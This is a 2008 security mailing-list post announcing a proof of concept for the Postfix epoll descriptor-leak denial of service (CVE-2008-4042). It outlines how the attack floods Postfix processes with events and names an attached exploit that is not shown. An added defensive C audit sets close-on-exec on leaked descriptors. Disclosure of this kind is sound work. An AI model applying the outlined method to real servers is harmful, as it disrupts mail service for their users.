Subject: [Suspected Spam][CVE-2008-4042] Postfix Linux-only local denial of service - PoC
From: Albert Sellarès <whats@wekk.net.>
To: [email protected]
Date: Tue, 16 Sep 2008 22:20:15 +0200
Hello,
I have released this PoC for the Linux-only local denial of service
caused by the leak of epoll file descriptors.
This proof of concept creates a pipe and adds it to Postfix's epoll file
descriptor.
When the pipe is added, an endless loop will launch lots of events to
the local and master postfix processes.
This PoC will slow down the system a lot.
You can find all the needed files at
http://www.wekk.net/research/CVE-2008-4042/ and
http://www.wekk.net/research/CVE-2008-3889/, and attached to this
email.
Feel free to write me for feedback, corrections, etc.
-- 
Albert Sellarès GPG id: 0x13053FFE
http://www.wekk.net [email protected]
Linux User: 324456 Catalunya
[Attachment: CVE-2008-4042-exploit.c]
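The epoll descriptor leak this message refers to is a descriptor that stays open across exec() because it lacks the close-on-exec flag. The following C audit is an added example, not part of the original post and not Postfix code: it counts epoll descriptors in the current process that a child would inherit and can set FD_CLOEXEC on them. The helper name `audit_epoll_leaks` is hypothetical, and the check assumes Linux with `/proc` mounted.

```c
#define _GNU_SOURCE
#include <dirent.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/epoll.h>
#include <unistd.h>

/* Returns 1 if fd is an epoll instance, judged by its Linux /proc symlink. */
static int is_epoll_fd(int fd)
{
    char path[64], target[64];
    snprintf(path, sizeof path, "/proc/self/fd/%d", fd);
    ssize_t n = readlink(path, target, sizeof target - 1);
    if (n < 0) return 0;
    target[n] = '\0';
    return strcmp(target, "anon_inode:[eventpoll]") == 0;
}

/* Hypothetical helper: counts epoll fds in this process that lack FD_CLOEXEC
 * (inherited across exec). If fix != 0, sets the flag. -1 if /proc is missing. */
int audit_epoll_leaks(int fix)
{
    DIR *d = opendir("/proc/self/fd");
    struct dirent *e;
    int leaks = 0;
    if (!d) return -1;
    while ((e = readdir(d)) != NULL) {
        char *end;
        int fd = (int)strtol(e->d_name, &end, 10);
        if (*end != '\0' || !is_epoll_fd(fd)) continue;   /* skips "." and ".." */
        int flags = fcntl(fd, F_GETFD);
        if (flags < 0 || (flags & FD_CLOEXEC)) continue;  /* already safe */
        leaks++;
        if (fix) fcntl(fd, F_SETFD, flags | FD_CLOEXEC);
    }
    closedir(d);
    return leaks;
}

int main(void)
{
    int ep = epoll_create(1);   /* constructed case: no close-on-exec flag */
    printf("inheritable: %d\n", audit_epoll_leaks(1));
    printf("after fix:   %d\n", audit_epoll_leaks(0));
    return close(ep);
}
```

Creating the descriptor with `epoll_create1(EPOLL_CLOEXEC)` sets the flag atomically, so the audit reports nothing for it.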